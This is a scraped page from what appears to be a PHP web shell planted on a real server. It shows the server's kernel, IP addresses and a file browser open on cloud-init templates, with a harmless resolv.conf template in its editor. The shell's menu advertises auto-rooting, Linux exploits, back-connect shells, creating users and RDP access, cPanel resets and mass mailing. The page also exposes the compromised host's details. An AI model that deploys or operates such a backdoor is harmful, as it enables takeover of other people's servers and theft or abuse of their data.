Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.14.132.178
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
cloud /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
chef_client.rb.tmpl
1.45
KB
-rw-r--r--
hosts.debian.tmpl
887
B
-rw-r--r--
hosts.freebsd.tmpl
914
B
-rw-r--r--
hosts.redhat.tmpl
912
B
-rw-r--r--
hosts.suse.tmpl
866
B
-rw-r--r--
ntp.conf.debian.tmpl
2.1
KB
-rw-r--r--
ntp.conf.fedora.tmpl
2.03
KB
-rw-r--r--
ntp.conf.rhel.tmpl
1.81
KB
-rw-r--r--
ntp.conf.sles.tmpl
3.11
KB
-rw-r--r--
ntp.conf.ubuntu.tmpl
2.45
KB
-rw-r--r--
resolv.conf.tmpl
812
B
-rw-r--r--
sources.list.debian.tmpl
1.47
KB
-rw-r--r--
sources.list.ubuntu.tmpl
2.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : resolv.conf.tmpl
## template:jinja # Your system has been configured with 'manage-resolv-conf' set to true. # As a result, cloud-init has written this file with configuration data # that it has been provided. Cloud-init, by default, will write this file # a single time (PER_ONCE). # {% if nameservers is defined %} {% for server in nameservers %} nameserver {{server}} {% endfor %} {% endif -%} {% if searchdomains is defined %} search {% for search in searchdomains %}{{search}} {% endfor %} {% endif %} {% if domain is defined %} domain {{domain}} {% endif %} {% if sortlist is defined %} sortlist {% for sort in sortlist %}{{sort}} {% endfor %} {% endif %} {% if options or flags %} options {% for flag in flags %}{{flag}} {% endfor %} {% for key, value in options.items() -%} {{key}}:{{value}} {% endfor %} {% endif %}
Close